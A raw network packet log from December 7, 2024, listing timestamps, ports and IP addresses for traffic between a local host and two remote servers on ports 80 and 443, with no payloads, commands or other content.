Dec 7, 2024 12:59:16.786650896 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.786662102 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.786689997 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.786712885 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.787811041 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.787826061 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.787872076 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.789061069 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.789076090 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.789119959 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.790138960 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.790159941 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.790195942 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.790220976 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.791342020 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.791356087 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.791409016 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.791409969 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.792486906 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.792511940 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.792524099 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.792536974 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.792567968 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.793627024 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.793682098 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.794202089 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.794224977 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.794249058 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.794269085 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.795382023 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.795422077 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.795439959 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.795468092 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.796629906 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.796644926 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.796686888 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.797780991 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.797796011 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.797841072 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.800158978 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.800183058 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.800221920 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.800241947 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.801239014 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.801268101 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.801281929 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.801290035 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.801301956 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.801323891 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.802534103 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.802548885 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.802612066 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.803625107 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.803641081 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.803687096 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.804784060 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.804799080 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.804846048 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.804864883 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.805946112 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.805959940 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.805996895 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.807121038 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.807136059 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.807149887 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.807177067 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.807199001 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.809665918 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.809680939 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.809726000 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.810666084 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.810688972 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.810717106 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.810740948 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.811912060 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.811969042 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.813008070 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.813030005 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.813055992 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.813072920 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.814255953 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.814271927 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.814316034 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.815346003 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.815361023 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.815407991 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.816520929 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.816576958 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.816638947 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.816649914 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.816699982 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.816729069 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.816766024 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.816783905 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.816807032 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.817677021 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.817697048 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.817729950 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.817747116 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.818922997 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.818938017 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.818983078 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.820028067 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.820108891 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.820642948 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.820657969 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.820729017 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.821795940 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.821820974 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.821832895 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.821852922 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.821878910 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.824122906 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.824139118 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.824193001 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.830164909 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.830183029 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.830277920 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.830305099 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.830359936 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.835899115 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.835915089 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.835922956 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.835990906 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.837066889 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.837105036 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.837129116 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.837158918 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.838246107 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.838262081 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.838273048 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.838310957 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.838331938 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.840574026 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.840589046 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.840636015 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.841828108 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.841845036 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.841891050 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.842941999 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.842957973 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.842968941 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.842994928 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.843007088 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.844038963 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.844057083 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.844089031 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.844105005 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.845277071 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.845326900 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.846434116 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.846450090 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.846514940 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.846538067 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.846579075 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.846940041 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.846952915 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.846962929 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.846987963 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.847014904 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.856432915 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.856523991 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.857520103 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.857532978 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.857564926 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.857585907 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.858922958 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.858939886 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.858977079 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.858994961 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.860165119 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.860196114 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.860223055 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.860238075 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.861547947 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.861619949 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.861634970 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.861658096 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.862709999 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.862763882 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.863913059 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.863924026 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.863967896 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.864984035 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.865000963 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.865036011 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.865057945 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.866102934 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.866117001 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.866163015 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.867158890 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.867182970 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.867203951 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.867225885 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.867263079 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.867286921 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.867336988 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.867367983 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.867381096 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.867494106 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.868428946 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.868482113 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.869684935 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.869699001 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.869740963 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.870785952 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.870799065 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.870841026 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.871676922 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.871689081 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.871742010 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.872848034 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.872859955 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.872900009 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.873352051 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.873364925 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.873405933 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.874809027 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.874860048 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.874860048 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.874952078 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.876193047 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.876207113 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.876249075 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.876993895 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.877016068 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.877053022 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.877068043 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.878034115 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.878046989 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.878057957 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.878083944 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.878115892 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.879249096 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.879261971 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.879302979 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.880352020 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.880364895 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.880409956 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.881545067 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.881558895 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.881597042 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.882957935 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.882972002 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.882982016 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.883006096 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.883024931 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.884238005 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.884251118 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.884303093 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.885195971 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.885210037 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.885221004 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.885258913 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.886219025 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.886230946 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.886277914 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.887387037 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.887401104 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.887442112 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.888607979 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.888628006 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.888662100 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.888680935 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.889781952 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.889796019 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.889836073 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.890893936 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.890907049 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.890917063 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.890947104 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.890993118 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.892168045 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.892180920 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.892220020 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.893229008 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.893240929 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.893275976 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.893299103 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.894402027 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.894414902 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.894450903 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.895735025 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.895749092 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.895759106 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.895786047 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.895804882 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.896754980 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.896770954 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.896806002 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.897914886 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.897927046 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.897964001 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.899162054 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.899642944 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.899656057 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.899729967 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.900810003 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.900832891 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.900842905 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.900847912 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.900883913 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.900908947 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.902036905 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.902053118 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.902098894 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.903301001 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.903321028 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.903374910 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.904373884 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.904422998 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.906724930 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.908004045 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.908019066 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.908030987 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.908070087 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.908097029 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.909162045 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.909176111 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.909236908 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.910244942 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.910258055 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.910315990 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.911370039 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.911384106 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.911395073 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.911427975 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.911451101 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.912552118 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.912569046 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.912607908 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.912630081 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.913724899 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.913738966 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.913790941 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.914913893 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.914928913 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.914974928 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.916079044 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.916090965 CET	80	49701	185.215.113.206	192.168.2.7
